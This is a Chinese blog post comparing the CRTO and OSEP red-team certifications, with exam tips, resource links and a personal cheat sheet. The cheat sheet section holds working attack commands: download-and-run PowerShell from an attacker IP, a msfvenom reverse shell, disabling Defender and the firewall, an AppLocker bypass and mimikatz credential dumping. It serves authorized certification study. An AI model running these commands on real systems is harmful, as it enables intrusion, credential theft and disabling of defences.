简介 & 区别

Red Team Ops
https://training.zeropointsecurity.co.uk/courses/red-team-ops
PEN-300: Advanced Evasion Techniques and Breaching Defenses | OffSec
https://www.offsec.com/courses/pen-300/

都是涉及AD的高级渗透，重合度很高，也存在一些区别

CRTO主要使用CS，而OSEP是禁止CS这类商业软件
CRTO的免杀直接用CS的arsenal-kit，OSEP的免杀要自己做
CRTO不讲原理，需要自己额外补充，OSEP讲的很细节
CRTO的考试环境和OSEP比起来小很多
CRTO一直在解释OPSEC，提供有ELK同步分析攻击行为产生的日志，OSEP不涉及这部分内容
CRTO的内容和OSEP相比多了ADCS，OSEP至今没更新这方面的内容

考试

CRTO

CRTO的考试是假定违规场景，从一个内鬼机器开始(所以这个机器是需要提权的)，4个自然日内48小时lab时间，没有监考，可以自己随时暂停，只要做好凭据收集权限维持这些，确保能随时继续就可以。通过标准是6/8，基本就是3个域8台机器，部分机器需要枚举提权。并且只需要简单记录提交flag即可，不需要写报告，考试结果在考试的4个自然日结束后自动出。

OSEP

OSEP也是48小时考试，但是是连续的48小时，有监考并且考试结束后需要在24小时内提交报告。考试环境就是比CRTO更大更复杂(20台左右)。黑盒场景，只给两个外部入口，自己想办法打进内网，进行枚举以及横向。考试有两种通过方式，一种是拿到最终核心secret.txt,另一种是累积获取10个flag(总量高于10个)，local或者proof这种。攻击路径也是不止一条，一条路走不通换其他路径。

考试可以随意使用开源C2，但msf就够用了。

一个小坑，对于local.txt,Linux还好,就是直接翻用户目录。challenge里windows机器IIS，MSSQL这些拿到的local是在对应目录下，例如IIS的inetpub，但考试是在Public用户目录下的，所以注意别遗漏

考试准备

考试环境就是Defender，提前准备好不同类型的免杀runner，例如：

直接上线的exe
Applocker + CLM Bypass的exe
amsi绕过
powershell shellcode runner
office macro
hta runner

另外准备好自己习惯的cheatsheet，我用的放后面commands了

tools

static的nmap，拿下入口机后通过入口机来探测内网，比通过代理稳很多

# powershell unzip
Expand-Archive C:\a.zip -DestinationPath C:\a

# linux tar
tar -xf nmap-7.91SVN-x86_64-portable.tar.gz

也有一些整理好的工具：

Flangvik/SharpCollection: Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.
https://github.com/Flangvik/SharpCollection
Syslifters/offsec-tools: Compiled tools for internal assessments
https://github.com/Syslifters/offsec-tools
61106960/adPEAS: Powershell tool to automate Active Directory enumeration.
https://github.com/61106960/adPEAS

参考资料

blog

Active Directory Security – Active Directory & Enterprise Security, Methods to Secure Active Directory, Attack Methods & Effective Defenses, PowerShell, Tech Notes, & Geek Trivia…
https://adsecurity.org/
Bypass-Evasion Techniques - Pentesting & Red Teaming Notes
https://notes.morph3.blog/windows/bypass-evasion-techniques
I’m bringing relaying back: A comprehensive guide on relaying anno 2022 - TrustedSec
https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
Red vs. Blue: Kerberos Ticket Times, Checksums, and You! - TrustedSec
https://www.trustedsec.com/blog/red-vs-blue-kerberos-ticket-times-checksums-and-you/
Manipulating User Passwords Without Mimikatz - TrustedSec
https://www.trustedsec.com/blog/manipulating-user-passwords-without-mimikatz/
Meterpreter vs Modern EDR(s) - RedOps - English
https://redops.at/en/blog/meterpreter-vs-modern-edrs-in-2023
Red teaming: Evading AV. Simple AV evasive malware | by Alex K | Apr, 2023 | InfoSec Write-ups
https://infosecwriteups.com/red-teaming-evading-av-c948ec5d10e9
Process injection in 2023, evading leading EDRs | Vincent Van Mieghem
https://vanmieghem.io/process-injection-evading-edr-in-2023/
Forging Tickets in 2023 - 0xdeaddood
https://0xdeaddood.rocks/2023/05/11/forging-tickets-in-2023/

系列

GOAD

环境加配套wp：

Orange-Cyberdefense/GOAD: game of active directory
https://github.com/Orange-Cyberdefense/GOAD
Mayfly
https://mayfly277.github.io/

AV Evasion By Hop Infosec

AV Evasion Part 1 · Hop Infosec
https://0xhop.github.io/evasion/2021/04/19/evasion-pt1/
AV Evasion Part 2, The disk is lava · Hop Infosec
https://0xhop.github.io/evasion/2021/05/26/evasion-pt2/
AV Evasion Part 3: Fibers · Hop Infosec
https://0xhop.github.io/evasion/2022/05/11/evasion-pt3/

Malware Dev By 0pr

Malware Dev 00 - Rust vs C++ 初探_0pr的博客-CSDN博客
https://blog.csdn.net/heisejiuhuche/article/details/129174832
Malware Dev 01 - 免杀之 PPID Spoofing 原理解析_0pr的博客-CSDN博客
https://blog.csdn.net/heisejiuhuche/article/details/129268901
Malware Dev 02 - Windows SDDL 后门利用之 SCManager_0pr的博客-CSDN博客
https://blog.csdn.net/heisejiuhuche/article/details/129198481
Malware Dev 03 - 隐匿之 Command Line Spoofing 原理解析_0pr的博客-CSDN博客
https://blog.csdn.net/heisejiuhuche/article/details/129311065
Malware Dev 04 - 隐匿之 ETW（Event Tracing for Windows）Bypass_0pr的博客-CSDN博客
https://blog.csdn.net/heisejiuhuche/article/details/129332463
Malware Dev 05 - 免杀之 Shellcode Execution Through Fiber_0pr的博客-CSDN博客
https://blog.csdn.net/heisejiuhuche/article/details/129455384

Active Directory By 0pr

Active Directory 01 - “史上最全”测试环境搭建模板_0pr的博客-CSDN博客
https://blog.csdn.net/heisejiuhuche/article/details/126593992
Active Directory 02 - Windows Kerberos Authentication（Kerberos 协议鉴权）_0pr的博客-CSDN博客
https://blog.csdn.net/heisejiuhuche/article/details/128976020
Active Directory 03 - Delegation（委派），MS-SFU 规范以及 Protocol Transition_0pr的博客-CSDN博客
https://blog.csdn.net/heisejiuhuche/article/details/128988699
Active Directory 04 - Bronze Bit Attack (CVE-2020-17049)_0pr的博客-CSDN博客
https://blog.csdn.net/heisejiuhuche/article/details/129010881
Active Directory 05 - 初识 AD CS 证书服务_0pr的博客-CSDN博客
https://blog.csdn.net/heisejiuhuche/article/details/129224570

域渗透GOAD(Game Of Active Directory) v2

域渗透GOAD(Game Of Active Directory) v2 （一） - 先知社区
https://xz.aliyun.com/t/12137
域渗透GOAD(Game Of Active Directory) v2 （二） - 先知社区
https://xz.aliyun.com/t/12138
域渗透GOAD(Game Of Active Directory) v2（三） - 先知社区
https://xz.aliyun.com/t/12139
域渗透GOAD(Game Of Active Directory) v2（四） - 先知社区
https://xz.aliyun.com/t/12140

codes

chvancooten/OSEP-Code-Snippets: A repository with my notable code snippets for Offensive Security’s PEN-300 (OSEP) course. (这个很多代码可以直接拿来改改就用)
https://github.com/chvancooten/OSEP-Code-Snippets
mvelazc0/defcon27_csharp_workshop: Writing custom backdoor payloads with C# - Defcon 27 Workshop
https://github.com/mvelazc0/defcon27_csharp_workshop
winsecurity/Offensive-C-Sharp
https://github.com/winsecurity/Offensive-C-Sharp
DamonMohammadbagher/NativePayloads: All my Source Codes (Repos) for Red-Teaming & Pentesting + Blue Teaming
https://github.com/DamonMohammadbagher/NativePayloads
api0cradle/UltimateAppLockerByPassList: The goal of this repository is to document the most common techniques to bypass AppLocker.
https://github.com/api0cradle/UltimateAppLockerByPassList
EvilEnigma/OSEP-Study: A repository of tools developed while studying for OSEP. The contents here are not part of courseware but some tools, i wrote as an extension to learning C# and offensive tooling.
https://github.com/EvilEnigma/OSEP-Study

CheatSheet

S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
Windows & Active Directory Exploitation Cheat Sheet and Command Reference :: Cas van Cooten
https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/
RistBS/Awesome-RedTeam-Cheatsheet: Red Team Cheatsheet in constant expansion.
https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
matthieu-hackwitharts/Win32_Offensive_Cheatsheet: Win32 and Kernel abusing techniques for pentesters
https://github.com/matthieu-hackwitharts/Win32_Offensive_Cheatsheet
ChatGPT answers Cybersecurity Interview questions
https://blog.killswitchx7.com/chatgpt-answers-cybersecurity-interview-questions
Active directory pentesting: cheatsheet and beginner guide
https://www.hackthebox.com/blog/active-directory-penetration-testing-cheatsheet-and-guide
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet

reviews

这个方向的就很多了，只放22和23年的：

2023

1.24 Offensive Security Experienced Penetration Tester (OSEP) Review - StefLan’s Security Blog
https://steflan-security.com/offensive-security-experienced-penetration-tester-osep-review/
2.5 OSEP PEN-300 review - Evasion and Breaching Techniques
https://www.alluresec.com/2023/02/05/osep-review/

2022

5.17 PEN-300 and OSEP review
https://niebardzo.github.io/2022-05-17-osep-review/
6.26 OSEP Study guide 2022 | LinkedIn
https://www.linkedin.com/pulse/osep-study-guide-2022-jo%C3%A3o-paulo-de-andrade-filho/
7.19 PEN-300 / OSEP review – Zolder B.V.
https://zolder.io/pen-300-osep-review/
7.30 OSEP PREPARATION. Article about — how to prepare for the… | by Karol Mazurek | Medium
https://karol-mazurek95.medium.com/osep-preparation-e4cad53b65f3
10.16 ノンペンテスターの OSEP 合格体験記 (2022/10) - 切られたしっぽ
https://migawari-iv.hatenablog.com/entry/2022/10/16/212215
10.24 PEN-300 & OSEP Exam Review – alex-labs.com
https://alex-labs.com/pen-300-osep-exam-review/

中文

OSCE3之路 - OSEP | PEN300 - 4xpl0r3r’s blog
https://cn.4xpl0r3r.com/%E8%AF%81%E4%B9%A6/OSCE3%E4%B9%8B%E8%B7%AF-OSEP-PEN300/
T00ls首发 OSEP考试的一点点心得 - 渗透测试文章(Security Articles) - T00ls | 低调求发展 - 潜心习安全
https://www.t00ls.com/thread-62781-1-1.html
OSEP REVIEW | Ikonw’s blog
https://ik0nw.github.io/2022/04/12/osep_review/

commands

经常用的一些命令：

# 初始nmap扫描，记得加-Pn参数
sudo nmap -A -Pn 192.168.xx.xx

# DotNetToJScript
DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js

# msf handler
# hander设置AutoRunScript，自动迁移到稳定进程
set AutoRunScript "migrate -n explorer.exe"
# 找不到explorer的情况下，尽快创建并迁移
meterpreter > execute -H -f notepad
Process 1196 created.
meterpreter > migrate 1196

# Linux msfvenom，prependfork参数
sudo msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 prependfork=true -f elf -t 300 -e x64/xor_dynamic -o test.elf
# linux，fork类似windows的migrate
set MeterpreterTryToFork true

# 高级可选项
# 自定义https证书
set HandlerSSLCert /home/kali/self_cert/nasa.pem
# stage 编码
set EnableStageEncoding true 
set StageEncoder x64/zutto_dekiru 
or 
set StageEncoder x64/xor_dynamic

# 检查防御措施
# powershell CLM 检查
$ExecutionContext.SessionState.LanguageMode
# PPL检查
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
# AppLocker检查
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe

# powershell加载运行脚本
(New-Object Net.WebClient).DownloadString('http://192.168.xx.xx/run.txt') | iex

# 下载文件
powershell -exec bypass -c "iwr http://192.168.xx.xx/mimikatz_2.2.0.exe -outfile mimikatz.exe"

# powershell 反射加载运行 C# exe
# 没有public
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.xx.xx/rev.exe')
$asm = [System.Reflection.Assembly]::Load($data)
# 无参数运行
$asm.EntryPoint.Invoke($null,[Object[]]@(,[String[]]@()))
# 带参数运行，处理
$al = New-Object -TypeName System.Collections.ArrayList
$al.Add("list_token bypass".Split())
$asm.EntryPoint.Invoke($null, $al.ToArray())

# public static
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[rev.Program]::Main("".Split())

# Applocker 使用installutil绕过
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe

# 直接运行command，不进入powerhsell交互
powershell -exec bypass -c "command"

# 关闭defender
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose
# 添加白名单目录
Add-MpPreference -ExclusionPath 'C:\Windows\Tasks'
# 删除所有规则
C:\"Program Files"\"Windows Defender"\MpCmdRun.exe -removedefinitions -all

# 关闭防火墙
NetSh Advfirewall set allprofiles state off

# 允许远程桌面PTH
powershell -c "New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -value 0"
# xfreerdp pth,加额外参数
xfreerdp /v:172.16.xx.xx /u:administrator /pth:xxxxxxxx 

# sshuttle打通隧道
sshuttle -v -r root@192.168.xx.xx 172.16.xx.0/24

# psexec启动system上下文
PsExec64.exe -accepteula -s -i cmd.exe

# MSSQL
impacket mssqlclient.py
# 不是kali里自带的impacket-mssqlclient,版本太老缺少增强功能

# mimikatz & kiwi
# lsa patch & dump
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"
mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "exit"
mimikatz.exe "token::elevate" "lsadump::secrets" "exit"
# meterpreter dump
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets

# wmic enum
# windows获取运行中的进程命令行参数
wmic process get caption,commandline /value

CRTO & OSEP受験記

2023-05-12